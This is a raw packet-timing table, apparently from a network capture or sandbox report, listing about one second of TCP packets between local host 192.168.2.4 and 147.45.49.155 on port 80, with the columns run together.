                                                                              Dec 18, 2024 21:00:19.363658905 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.373250008 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.373271942 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.373325109 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.391776085 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.391796112 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.391849041 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.410798073 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.410818100 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.410831928 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.410877943 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.429202080 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.429248095 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.429274082 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.447678089 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.447721958 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.447732925 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.465783119 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.465801954 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.465838909 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.483498096 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.483517885 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.483573914 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.501074076 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.501092911 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.501116037 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.501159906 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.501195908 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.518119097 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.518135071 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.518203974 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.534987926 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.535012960 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.535098076 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.549961090 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.549981117 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.550051928 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.565907001 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.565924883 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.565937996 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.566024065 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.580655098 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.580676079 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.580733061 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.595792055 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.595814943 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.595844030 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.610624075 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.610640049 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.610667944 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.625474930 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.625510931 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.625550985 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.640064955 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.640080929 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.640093088 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.640117884 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.640161991 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.654484034 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.654499054 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.654563904 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.668617010 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.668632030 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.668704987 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.682420015 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.682444096 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.682492971 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.696352959 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.696372986 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.696379900 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.696474075 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.710213900 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.710230112 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.710313082 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.724062920 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.724088907 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.724142075 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.737921953 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.737936974 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.737973928 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.751626015 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.751640081 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.751694918 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.765053988 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.765091896 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.765125990 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.765129089 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.765170097 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.779545069 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.779560089 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.779613018 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.791148901 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.791162968 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.791214943 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.803780079 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.803792953 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.804084063 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.816230059 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.816243887 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.816291094 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.828547001 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.828568935 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.828583002 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.828628063 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.840415001 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.840434074 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.840507984 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.852257967 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.852274895 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.852334023 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.864115000 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.864129066 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.864181042 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.875960112 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.875979900 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.876068115 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.887531996 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.887547970 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.887561083 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.887605906 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.899118900 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.899135113 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.899168968 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.910559893 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.910576105 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.910624981 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.921914101 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.921928883 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.921963930 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.933269024 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.933286905 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.933299065 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.933320999 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.933358908 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.944638968 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.944654942 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.944720030 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.955791950 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.955806017 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.955888987 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.966751099 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.966763973 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.966821909 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.977595091 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.977608919 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.977660894 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.988342047 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.988363028 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.988375902 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.988420010 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:19.998917103 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.998935938 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:19.999012947 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.009404898 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.009418964 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.009490013 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.019733906 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.019757032 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.019784927 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.030002117 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.030016899 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.030029058 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.030057907 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.030095100 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.040146112 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.040162086 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.040213108 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.050003052 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.050017118 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.050095081 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.059973955 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.059987068 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.060058117 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.069886923 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.069902897 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.069974899 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.079632998 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.079653025 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.079663992 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.079711914 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.089406013 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.089426041 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.089472055 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.098925114 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.098938942 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.098973989 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.108395100 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.108453989 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.108530998 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.117785931 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.117805004 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.117985010 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.127027988 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.127047062 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.127059937 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.127079964 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.127307892 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.136213064 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.136226892 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.136311054 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.145478010 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.145499945 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.145565033 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.154583931 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.154599905 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.154709101 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.163563967 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.163580894 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.163593054 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.163644075 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.172496080 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.172521114 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.172590971 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.181452990 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.181467056 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.181571960 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.190251112 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.190264940 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.190372944 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.198596954 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.198616028 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.198824883 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.206911087 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.206924915 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.206935883 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.206969976 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.206993103 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.215230942 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.215245962 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.215411901 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.223567009 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.223579884 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.223725080 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.231729984 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.231745005 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.231985092 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.239916086 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.239931107 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.239942074 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.239996910 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.248019934 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.248050928 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.248115063 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.256201029 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.256215096 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.256283998 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.264393091 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.264406919 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.264483929 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.272569895 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.272591114 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.272650003 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.280924082 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.280936956 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.280949116 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.280968904 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.281111002 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.288856030 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.288870096 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.288927078 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.296782970 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.296798944 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.296847105 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.304586887 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.304601908 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.304661036 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.312315941 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.312330961 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.312342882 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.312412024 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.319987059 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.320060968 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.320128918 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.327629089 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.327645063 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.327682972 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.335212946 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.335227013 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.335280895 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.342607975 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.342628956 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.342701912 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.349988937 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.350008011 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.350018978 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.350079060 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.350110054 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.357379913 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.357393026 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.357443094 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.364753008 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.364765882 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.364833117 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.371999979 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.372013092 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.372080088 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.379215002 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.379235983 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.379247904 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.379302025 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.386398077 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.386430979 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.386477947 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.393460989 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.393482924 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.393518925 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.400259972 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.400274038 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.400346041 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.407243013 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.407254934 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.407331944 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.413768053 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.413783073 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.413794994 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.413852930 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.413953066 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.420312881 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.420330048 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.420454979 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.427133083 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.427150011 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.427333117 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.433707952 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.433729887 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.434077978 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.440361977 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.440377951 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.440390110 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.440447092 CET4973380192.168.2.4147.45.49.155
                                                                              Dec 18, 2024 21:00:20.447104931 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.447124004 CET8049733147.45.49.155192.168.2.4
                                                                              Dec 18, 2024 21:00:20.447174072 CET4973380192.168.2.4147.45.49.155
